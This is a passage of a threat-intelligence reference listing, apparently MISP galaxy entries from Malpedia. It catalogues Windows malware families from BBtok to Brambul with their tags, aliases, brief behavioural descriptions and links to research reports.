The tag is: misp-galaxy:malpedia="BBtok"

BBtok is also known as:

Table 1469. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bbtok
https://blog.360totalsecurity.com/en/360-file-less-attack-protection-intercepts-the-banker-trojan-bbtok-active-in-mexico/

Beapy

The tag is: misp-galaxy:malpedia="Beapy"

Beapy is also known as:

Table 1470. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy
https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china

Bedep

The tag is: misp-galaxy:malpedia="Bedep"

Bedep is also known as:

Table 1471. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep

Bee

Malware family observed in conjunction with PlugX infrastructure in 2013.

The tag is: misp-galaxy:malpedia="Bee"

Bee is also known as:

Table 1472. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bee
https://www.virustotal.com/gui/file/38f9ce7243c7851d67b24eb53b16177147f38dfffe201c5bedefe260d22ac908/detection

beendoor

BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim’s desktop.

The tag is: misp-galaxy:malpedia="beendoor"

beendoor is also known as:

Table 1473. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor
https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

BeepService

The tag is: misp-galaxy:malpedia="BeepService"

BeepService is also known as:

Table 1474. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice
https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Belonard

Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.

The tag is: misp-galaxy:malpedia="Belonard"

Belonard is also known as:

Table 1475. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard
https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0

Berbomthum

The tag is: misp-galaxy:malpedia="Berbomthum"

Berbomthum is also known as:

Table 1476. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.berbomthum
https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/

BernhardPOS

The tag is: misp-galaxy:malpedia="BernhardPOS"

BernhardPOS is also known as:

Table 1477. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos
https://securitykitten.github.io/2015/07/14/bernhardpos.html

BestKorea

The tag is: misp-galaxy:malpedia="BestKorea"

BestKorea is also known as:

Table 1478. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bestkorea
https://github.com/Jacquais/BestKorea

BetaBot

The tag is: misp-galaxy:malpedia="BetaBot"

BetaBot is also known as:

Neurevt

Table 1479. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot
https://securelist.com/financial-cyberthreats-in-2020/101638/
https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39
https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html
https://www.cybereason.com/blog/betabot-banking-trojan-neurevt
http://www.xylibox.com/2015/04/betabot-retrospective.html
https://news.sophos.com/en-us/2020/05/14/raticate/
http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref
https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728
https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en
http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html

Bezigate

Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.

The Trojan may perform the following actions: List, move, and delete drives List, move, and delete files List processes and running Windows titles List services List registry values Kill processes Maximize, minimize, and close windows Upload and download files Execute shell commands Uninstall itself

The tag is: misp-galaxy:malpedia="Bezigate"

Bezigate is also known as:

Table 1480. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate
https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

BfBot

The tag is: misp-galaxy:malpedia="BfBot"

BfBot is also known as:

Table 1481. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot

BI_D Ransomware

Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows sytem processes and kills shadow copies.

The tag is: misp-galaxy:malpedia="BI_D Ransomware"

BI_D Ransomware is also known as:

Table 1482. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware
http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/
http://zirconic.net/2018/07/bi_d-ransomware/

bifrose

The tag is: misp-galaxy:malpedia="bifrose"

bifrose is also known as:

Table 1483. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bifrose
https://blog.trendmicro.com/trendlabs-security-intelligence/bifrose-now-more-evasive-through-tor-used-for-targeted-attack/
https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html

BillGates

BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.

BillGates is available for *nix-based systems as well as for Windows.

On Windows, the (Bill)Gates installer typically contains the various modules as linked resources.

The tag is: misp-galaxy:malpedia="BillGates"

BillGates is also known as:

Table 1484. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates
https://securelist.com/versatile-ddos-trojan-for-linux/64361/
https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html
https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf
https://habrahabr.ru/post/213973/
https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/

Binanen

Binanen is a dropper that drops and executes a section of itself into a hidden dummy process. According to F-Secure, it executes command line tools such as (for example) asipconfig, which is useful to retrieve the network configuration. The malware aims to steal information about the machine, the username, installed software and, more generally speaking, it potentially can carry out actions on the compromised machine.

The tag is: misp-galaxy:malpedia="Binanen"

Binanen is also known as:

Table 1485. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen
https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj_{Binanen-B/detailed-analysis.aspx[https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj}Binanen-B/detailed-analysis.aspx]
https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

BioData

The tag is: misp-galaxy:malpedia="BioData"

BioData is also known as:

Table 1486. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata
https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/
https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/

bioload

The tag is: misp-galaxy:malpedia="bioload"

bioload is also known as:

Table 1487. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bioload
https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html

BIOPASS

BIOPASS RAT is a malware family which targets online gambling companies in China by leveraging a watering hole attack. This Remote Access Trojan (RAT) is unique in that it leverages the Open Broadcaster Software (OBS) framework to monitor the user’s screen.

The tag is: misp-galaxy:malpedia="BIOPASS"

BIOPASS is also known as:

Table 1488. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.biopass
https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html

Biscuit

The tag is: misp-galaxy:malpedia="Biscuit"

Biscuit is also known as:

zxdosml

Table 1489. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

BISTROMATH

The tag is: misp-galaxy:malpedia="BISTROMATH"

BISTROMATH is also known as:

Table 1490. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath
https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/
https://www.us-cert.gov/ncas/analysis-reports/ar20-045a
https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/
https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/
https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

BitPyLock

Bitpylock is a ransomware that encrypts files by using asymmetric keys and puts '.bitpy' as suffix once the encryption phase ended. The ransom note appears on the affected user’s Desktop with the following name: "# # HELP_TO_DECRYPT_YOUR_FILES # .html". At the time of writing the ransom request is 0.8 BTC and the communication email is: helpbitpy@cock.li.

The tag is: misp-galaxy:malpedia="BitPyLock"

BitPyLock is also known as:

Table 1491. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock
https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview
https://twitter.com/malwrhunterteam/status/1215252402988822529
https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/

Bitsran

SHADYCAT is a dropper and spreader component for the HERMES 2.1 RANSOMWARE radical edition.

The tag is: misp-galaxy:malpedia="Bitsran"

Bitsran is also known as:

SHADYCAT

Table 1492. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran
https://content.fireeye.com/apt/rpt-apt38
http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html
https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf

Bitter RAT

The tag is: misp-galaxy:malpedia="Bitter RAT"

Bitter RAT is also known as:

Table 1493. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat
https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan
https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf
https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/

BitRAT

The tag is: misp-galaxy:malpedia="BitRAT"

BitRAT is also known as:

Table 1494. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat
https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html
https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/
https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md
https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html
https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

Bizzaro

The tag is: misp-galaxy:malpedia="Bizzaro"

Bizzaro is also known as:

Table 1495. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bizarro
https://securelist.com/bizarro-banking-trojan-expands-its-attacks-to-europe/102258/

BKA Trojaner

BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.

The tag is: misp-galaxy:malpedia="BKA Trojaner"

BKA Trojaner is also known as:

bwin3_bka

Table 1496. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner
https://www.evild3ad.com/405/bka-trojaner-ransomware/

BLACKCOFFEE

a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft’s Technet portal.

The tag is: misp-galaxy:malpedia="BLACKCOFFEE"

BLACKCOFFEE is also known as:

PNGRAT
ZoxPNG
gresim

Table 1497. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee
https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
http://malware-log.hatenablog.com/entry/2015/05/18/000000_1
https://www.secureworks.com/research/threat-profiles/bronze-mohawk
https://attack.mitre.org/software/S0069/
http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://www.secureworks.com/research/threat-profiles/bronze-keystone
https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf
https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/

BlackEnergy

BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.

Version 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to - download and execute a remote file; - execute a local file on the infected computer; - update the bot and its plugins;

The Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.

In 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included: - operations with victim’s filesystem - spreading with a parasitic infector - spying features like keylogging, screenshoots or a robust password stealer - Team viewer and a simple pseudo “remote desktop” - listing Windows accounts and scanning network - destroying the system

Typical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.

On 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.

The tag is: misp-galaxy:malpedia="BlackEnergy"

BlackEnergy is also known as:

Table 1498. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy
https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/
https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf
https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too
https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection
https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/
https://www.secureworks.com/research/threat-profiles/iron-viking
https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html
https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/
https://securelist.com/black-ddos/36309/
http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf
https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/
https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf
https://www.secureworks.com/research/blackenergy2
https://marcusedmondson.com/2019/01/18/black-energy-analysis/
https://threatconnect.com/blog/casting-a-light-on-blackenergy/
https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf

BlackKingdom Ransomware

The tag is: misp-galaxy:malpedia="BlackKingdom Ransomware"

BlackKingdom Ransomware is also known as:

Table 1499. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware
https://news.sophos.com/en-us/2021/03/23/black-kingdom/
https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html
https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html
https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer—a-ransomware—and-a-botnet-join-the-part.html
https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities
https://securelist.com/black-kingdom-ransomware/102873/

BlackMatter (Windows)

Ransomware-as-a-Service

The tag is: misp-galaxy:malpedia="BlackMatter (Windows)"

BlackMatter (Windows) is also known as:

Table 1500. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751
https://blog.group-ib.com/blackmatter#
https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/
https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/
https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/
https://blog.minerva-labs.com/blackmatter
https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/
https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/
https://www.netskope.com/blog/netskope-threat-coverage-blackmatter
https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html
https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf
https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service
https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/
https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2
https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d
https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/

BlackNET RAT

Advanced and modern Windows botnet with PHP panel developed using VB.NET

The tag is: misp-galaxy:malpedia="BlackNET RAT"

BlackNET RAT is also known as:

Table 1501. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat
https://github.com/BlackHacker511/BlackNET/
http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html
https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/
https://labs.k7computing.com/?p=21365
https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware
https://github.com/FarisCode511/BlackNET/

BlackNix RAT

The tag is: misp-galaxy:malpedia="BlackNix RAT"

BlackNix RAT is also known as:

Table 1502. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknix_rat
https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb

BlackPOS

BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials.

The tag is: misp-galaxy:malpedia="BlackPOS"

BlackPOS is also known as:

Kaptoxa
MMon
POSWDS
Reedum

Table 1503. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos
https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/

BlackRemote

The tag is: misp-galaxy:malpedia="BlackRemote"

BlackRemote is also known as:

BlackRAT

Table 1504. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote
https://news.sophos.com/en-us/2020/05/14/raticate/
https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/
https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/

BlackRevolution

The tag is: misp-galaxy:malpedia="BlackRevolution"

BlackRevolution is also known as:

Table 1505. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution

BlackRouter

The tag is: misp-galaxy:malpedia="BlackRouter"

BlackRouter is also known as:

BLACKHEART

Table 1506. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter
https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/
https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/

Blackruby

Ransomware.

The tag is: misp-galaxy:malpedia="Blackruby"

Blackruby is also known as:

Table 1507. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby
https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/
https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware

BlackShades

The tag is: misp-galaxy:malpedia="BlackShades"

BlackShades is also known as:

Table 1508. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades
https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/
https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/
https://www.secureworks.com/research/threat-profiles/aluminum-saratoga
http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html
https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/

BlackSoul

The tag is: misp-galaxy:malpedia="BlackSoul"

BlackSoul is also known as:

Table 1509. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksoul
https://quointelligence.eu/2021/01/reconhellcat-uses-nist-theme-as-lure-to-deliver-new-blacksoul-malware/

Blackworm RAT

The tag is: misp-galaxy:malpedia="Blackworm RAT"

Blackworm RAT is also known as:

Table 1510. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat
https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html
https://github.com/BlackHacker511/BlackWorm
https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/

BLINDINGCAN

According to SentinelOne, this RAT can gather and transmit a defined set of system features, create/terminate/manipulate processes and files, and has self-updating and deletion capability.

The tag is: misp-galaxy:malpedia="BLINDINGCAN"

BLINDINGCAN is also known as:

DRATzarus RAT

Table 1511. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf
https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/
https://www.hvs-consulting.de/lazarus-report/
https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html

BLINDTOAD

BLINDTOAD is 64-bit Service DLL that loads an encrypted file from disk and executes it in memory.

The tag is: misp-galaxy:malpedia="BLINDTOAD"

BLINDTOAD is also known as:

Table 1512. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad
https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html
https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/
https://content.fireeye.com/apt/rpt-apt38

BloodyStealer

The tag is: misp-galaxy:malpedia="BloodyStealer"

BloodyStealer is also known as:

Table 1513. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bloodystealer
https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/
https://twitter.com/3xp0rtblog/status/1380087553676697617

BLUETHER

The tag is: misp-galaxy:malpedia="BLUETHER"

BLUETHER is also known as:

CAPGELD

Table 1514. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether
https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf
https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf

BluStealer

Avast describe this malware as a recombination of other malware including SpyEx, ThunderFox, ChromeRecovery, StormKitty, and firepwd.

The tag is: misp-galaxy:malpedia="BluStealer"

BluStealer is also known as:

a310logger

Table 1515. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.blustealer
https://decoded.avast.io/anhho/blustealer/
https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/
https://twitter.com/GoSecure_Inc/status/1437435265350397957
https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer

Boaxxe

The tag is: misp-galaxy:malpedia="Boaxxe"

Boaxxe is also known as:

Table 1516. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe
https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/

Bohmini

The tag is: misp-galaxy:malpedia="Bohmini"

Bohmini is also known as:

Table 1517. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini

Bolek

The tag is: misp-galaxy:malpedia="Bolek"

Bolek is also known as:

KBOT

Table 1518. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek
https://securelist.com/kbot-sometimes-they-come-back/96157/
http://www.cert.pl/news/11379
https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt

BOOSTWRITE

FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

The tag is: misp-galaxy:malpedia="BOOSTWRITE"

BOOSTWRITE is also known as:

Table 1519. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite
https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

BOOTWRECK

BOOTWRECK is a master boot record wiper malware.

The tag is: misp-galaxy:malpedia="BOOTWRECK"

BOOTWRECK is also known as:

MBRkiller

Table 1520. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck
https://content.fireeye.com/apt/rpt-apt38
https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/

Borr

The tag is: misp-galaxy:malpedia="Borr"

Borr is also known as:

Table 1521. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.borr
https://twitter.com/ViriBack/status/1222704498923032576
https://github.com/onek1lo/Borr-Stealer
https://telegra.ph/Borr-Malware-02-04

Bouncer

The tag is: misp-galaxy:malpedia="Bouncer"

Bouncer is also known as:

Table 1522. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

Bozok

The tag is: misp-galaxy:malpedia="Bozok"

Bozok is also known as:

Table 1523. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok
https://securelist.com/apt-trends-report-q1-2021/101967/
https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe
https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html

BRAIN

The tag is: misp-galaxy:malpedia="BRAIN"

BRAIN is also known as:

Table 1524. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.brain
https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/

Brambul

Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim’s networks.

The tag is: misp-galaxy:malpedia="Brambul"

Brambul is also known as:

SORRYBRUTE

